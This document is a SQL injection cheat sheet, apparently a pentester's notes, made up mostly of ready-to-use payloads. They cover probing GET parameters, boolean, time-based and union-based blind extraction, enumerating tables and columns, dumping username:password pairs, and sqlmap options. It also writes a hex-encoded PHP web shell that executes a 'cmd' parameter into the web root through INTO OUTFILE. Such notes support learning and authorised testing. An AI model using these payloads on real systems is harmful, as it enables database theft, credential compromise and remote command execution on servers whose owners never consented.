# SQL Injection * [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/) ## Finding an Opportunity * GET parameter ```sh http://example.com/index.php?id=' or 1=1 -- - ``` * Sometimes an ID or may come first ```sh http://example.com/index.php?id=10 or 1=1 -- + http://example.com/index.php?id=10' or '1'='1'-- - http://example.com/index.php?id=-1' or 1=1 -- -&password=x ``` * Provoke error to gain information ```sh http://example.com/index.php?id=' ``` * **Incase of client side sanitization craft the URL instead of using the form!!!** ## Usage * Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` ```sql SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ ``` ### Boolean True and False ```sql SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ``` * Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char. ```sql ' UNION SELECT null,null,null where database() like 'da%';-- - ``` ### Time based * Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes ```sql ' union select sleep(3), null; -- - ``` ### Blind injection // Guessing characters ```sh http://example.com/?id=1' and substr((select database()),1,1) < 105 --+ ``` ```sh http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ ``` * Function substr(string, start, length) * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` ### Union based * _First method__ check by order until error occurs ```sql ' order by 1 -- - ' order by 2 -- - ' order by 3 -- - ``` * __Second method__ fuzzing NULL values, followed by fuzzing data types * Check number of cols ```sql ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- # until the error occurs ``` * Check which one is a string ```sql ' UNION SELECT 'a',NULL,NULL,NULL-- ' UNION SELECT NULL,'a',NULL,NULL-- ' UNION SELECT NULL,NULL,'a',NULL-- ' UNION SELECT NULL,NULL,NULL,'a'-- ``` * Retrieve content, for cols and comment two times as an example. Or dump database ```sql ' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- // ' UNION SELECT NULL,username,password,NULL FROM users -- // ``` * Retrieve content by union poking the count and order, afterwards extracting tables via ```sh 0 union select null, null, database() 0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db' 0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename' 0 union select null, null, group_concat(username, ':', password from found_tablename ``` * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) ### Identify Database ```sh id=sqlite_version() id=@@version # mysql/mssql id=(SELECT banner FROM v$version) # oracle ``` #### SQL Functions * Use sql functions to fumble the tables & cols via union * [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635) * Extract tables ```sql 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- - ``` * sqlite specific ```sql ' UNION SELECT sql, sql FROM sqlite_master -- - ``` ```sql (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') ``` * Extract cols ```sh 1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- - ``` * Data from cols ```sql 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- - ``` ## Insert * Check user file permissions ```sql union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- - ``` * Insert file through insertion of `system()` or `exec_shell()` and a get parameter ```sql 'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- - ``` * Insert `` ```sql " Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- - ``` ### Examples * sqli inside HTTP request to an API. Five values inside select have been discovered before ```HTTP GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1 ``` * Get col names ```HTTP GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1 ``` * Get notes from users by id ```HTTP GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1 ``` ## Payloads * [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)